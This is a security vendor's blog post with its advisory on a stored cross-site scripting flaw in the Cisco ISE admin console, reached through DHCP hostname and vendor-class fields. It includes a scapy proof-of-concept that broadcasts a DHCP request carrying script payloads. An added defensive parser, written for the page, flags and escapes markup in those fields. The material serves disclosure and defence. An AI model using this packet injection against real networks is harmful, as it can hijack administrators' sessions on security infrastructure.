2020-02-19

More security brings more insecurity

modzero found a vulnerability in the Cisco Identity Services Engine (ISE) environment which allows arbitrary participants of a network to inject arbitrary JavaScript payload right into the administrative web page of the Cisco ISE administration interface.

Cisco ISE is considered to enhance the overall network security by limiting access to local area networks. Arbitrary users using DHCP as a yet anonymous participant are able to exploit weaknesses in Cisco's administrative interfaces and thus bypass the increased security level:

The hostname and the vendor_class_id options of any DHCP request can be abused to inject malicious payload that executes code in the context of the browser of the administrator connecting to the Web interface. Further details and a PoC are available in our advisory.

Direct Link: https://www.modzero.com/advisories/MZ-19-03-CISCO-ISE.txt

----------------------------------------------------[MZ-19-03]----v1.2--

modzero Security Advisory:

Unauthenticated persistent cross-site scripting injection into the
administrative console of CISCO ISE web application via DHCP request

------------------------------------------------------------------------

------------------------------------------------------------------------

1. Timeline

------------------------------------------------------------------------

* 2019-11-22: Advisory sent to Cisco PSIRT psirt@cisco.com
* 2019-11-22: PSIRT opened case (PSIRT-0535851956) 
* 2019-11-22: PSIRT communicated tentative publishing date '2020-02-19'
* 2020-02-12: PSIRT incident manager confirmed reproducibility
* 2020-02-12: Received an unofficial CVE Number CVE-2020-3156
* 2020-02-19: modzero released advisory to the public

In accordance with modzero's disclosure policy, the advisory is
expected to be published not later than February 21st, 2020. Our
disclosure policy is available at:

https://www.modzero.ch/static/modzero_Disclosure_Policy.pdf

------------------------------------------------------------------------

2. About

------------------------------------------------------------------------

Affected vendor: Cisco
Latest product versions known to be vulnerable:
    * Cisco Identity Services Engine version 2.6.0.156, Patch 2, 3
      - Product Identifier: SNS-3655-K9
      - Version Identifier A0
      - ADE-OS Version 3.0.5.144

The Cisco Identity Services Engine is the engine behind Cisco's Network
Access Control solution. It enables the creation and enforcement of
security and access policies for endpoint devices connected to the
company's routers and switches.

------------------------------------------------------------------------

3. Details

------------------------------------------------------------------------

An unauthenticated attacker who is able to inject a specially crafted
DHCP request packet into the network controlled by Cisco Identity
Services Engine (ISE) is able to persistently store code (e.g.
JavaScript), which is executed in the context of the Web browser
accessing the Web-based management interface.

The vulnerability is due to insufficient validation and encoding of the
attacker-controllable input within the hostname and vendor class
identifier fields of processed DHCP request packets.

The attacker-controlled code will be executed in the context of the
user of the Web-based management console if a legitimate user is
reviewing an endpoint's attributes within the Identity Services
Engine's Web-based management interface.

The attacker-controlled code will be executed in the context of the
user that is currently logged in to the Web-based management console,
when the endpoint attribute details are reviewed by opening the
following URL:

https://ISESRV/admin/login.jsp#context_dir/context_dir_devices/endpointDetails

------------------------------------------------------------------------

4. Impact

------------------------------------------------------------------------

The code will be executed with the rights of the user accessing the Web-
based management console. If the user has administrative rights, the
attacker might be able to leverage arbitrary functions of the Web-based
management interface.

------------------------------------------------------------------------

5. Proof of Concept exploit

------------------------------------------------------------------------

Using the following python script, two simple JavaScript code fragments 
will be sent in the hostname and vendor class identifier fields of the
DHCP request. 

#!/usr/bin/env python
# PoC: send one DHCPREQUEST carrying the test payloads in option 12
# (hostname) and option 60 (vendor class identifier). Requires scapy and
# raw-socket privileges on the sending interface.

from scapy.all import *

conf.iface = "eth0"  # interface attached to the ISE-monitored network
hostname_payload = "<script>alert('hostname payload')</script>"
vendor_class_id_payload = "<script>alert('v class id payload')</script>"

# raw 6-byte hardware address of the sending interface
_, hw    = get_if_raw_hwaddr(conf.iface)
ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw, type=0x800)
ip       = IP(src='0.0.0.0', dst='255.255.255.255')  # client has no address yet
udp      = UDP(sport=68, dport=67)                   # DHCP client -> server ports
bootp    = BOOTP(op=1, chaddr=hw)                    # op=1: BOOTREQUEST
dhcp     = DHCP(options=[("message-type", "request"),
                         ("hostname", hostname_payload),
                         ("vendor_class_id", vendor_class_id_payload),
                         "end"])

packet   = ethernet / ip / udp / bootp / dhcp

sendp(packet, iface=conf.iface)

Once a person reviews the attributes of an endpoint within the ISE web-
based management interface the code will be executed.
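The two DHCP fields named in section 3 and exercised by the PoC above are plain TLV options (12 = hostname, 60 = vendor class identifier, RFC 2132). The following added example, written for this page and not part of the advisory or of any Cisco code, parses the option block of a raw DHCP message, flags hostname and vendor class values that carry HTML or JavaScript markup, and shows the HTML-escaped form a management UI should render instead of the raw string. The sample DHCPREQUEST is constructed inline; the escaping step illustrates contextual output encoding in general and is not a description of Cisco's fix.

```python
import html
import re

DHCP_MAGIC = b"\x63\x82\x53\x63"   # magic cookie that starts the option block
OPT_PAD, OPT_END = 0, 255
OPT_HOSTNAME, OPT_VENDOR_CLASS_ID, OPT_MSG_TYPE = 12, 60, 53

# Characters that have no legitimate place in a hostname or vendor class id
# but are exactly what a stored-XSS payload needs.
MARKUP_RE = re.compile(r"[<>\"'&]|javascript:", re.IGNORECASE)


def parse_dhcp_options(dhcp_payload: bytes) -> dict:
    """Return {option_code: raw_value} from a raw DHCP message (UDP payload)."""
    # The fixed BOOTP header is 236 bytes; the magic cookie follows at 236..239.
    if len(dhcp_payload) < 240 or dhcp_payload[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message")
    opts, i = {}, 240
    while i < len(dhcp_payload):
        code = dhcp_payload[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:          # single-byte padding, no length field
            i += 1
            continue
        if i + 1 >= len(dhcp_payload):
            raise ValueError("truncated option header")
        length = dhcp_payload[i + 1]
        value = dhcp_payload[i + 2:i + 2 + length]
        if len(value) != length:     # length byte claims more than is present
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts


def suspicious_fields(opts: dict) -> dict:
    """Flag option 12/60 values containing markup; map code -> HTML-escaped text."""
    flagged = {}
    for code in (OPT_HOSTNAME, OPT_VENDOR_CLASS_ID):
        if code in opts:
            text = opts[code].decode("utf-8", errors="replace")
            if MARKUP_RE.search(text):
                flagged[code] = html.escape(text)   # safe form for an HTML context
    return flagged


def build_request(hostname: bytes, vendor_class: bytes) -> bytes:
    """Constructed minimal DHCPREQUEST (op=1, zeroed header) for offline testing."""
    def tlv(code: int, value: bytes) -> bytes:
        return bytes([code, len(value)]) + value
    header = b"\x01" + b"\x00" * 235
    return (header + DHCP_MAGIC + tlv(OPT_MSG_TYPE, b"\x03")
            + tlv(OPT_HOSTNAME, hostname) + tlv(OPT_VENDOR_CLASS_ID, vendor_class)
            + bytes([OPT_END]))
```

Run `suspicious_fields(parse_dhcp_options(build_request(b"<b>x</b>", b"MSFT 5.0")))` to see option 12 flagged and option 60 passed through; a real deployment would feed it the UDP payload of captured client-to-server DHCP traffic.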

------------------------------------------------------------------------

6. Workaround

------------------------------------------------------------------------

-

------------------------------------------------------------------------

7. Fix

------------------------------------------------------------------------

No software updates are available yet.

------------------------------------------------------------------------

8. Credits

------------------------------------------------------------------------

 * Max Moser 
 * Katharina Maennle

------------------------------------------------------------------------

9. About modzero

------------------------------------------------------------------------

The independent company modzero assists clients with security analysis
in the complex areas of computer technology. The focus lies on highly
detailed technical analysis of concepts, software and hardware
components as well as the development of individual solutions.
Colleagues at modzero work exclusively in practical, highly technical
computer-security areas and can draw on decades of experience in
various platforms, system concepts, and designs.

Website: https://www.modzero.ch
E-Mail: contact@modzero.ch

------------------------------------------------------------------------

10. Disclaimer

------------------------------------------------------------------------

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


Posted by modzero | File under: security, software, hacking, cisco, exploit, advisory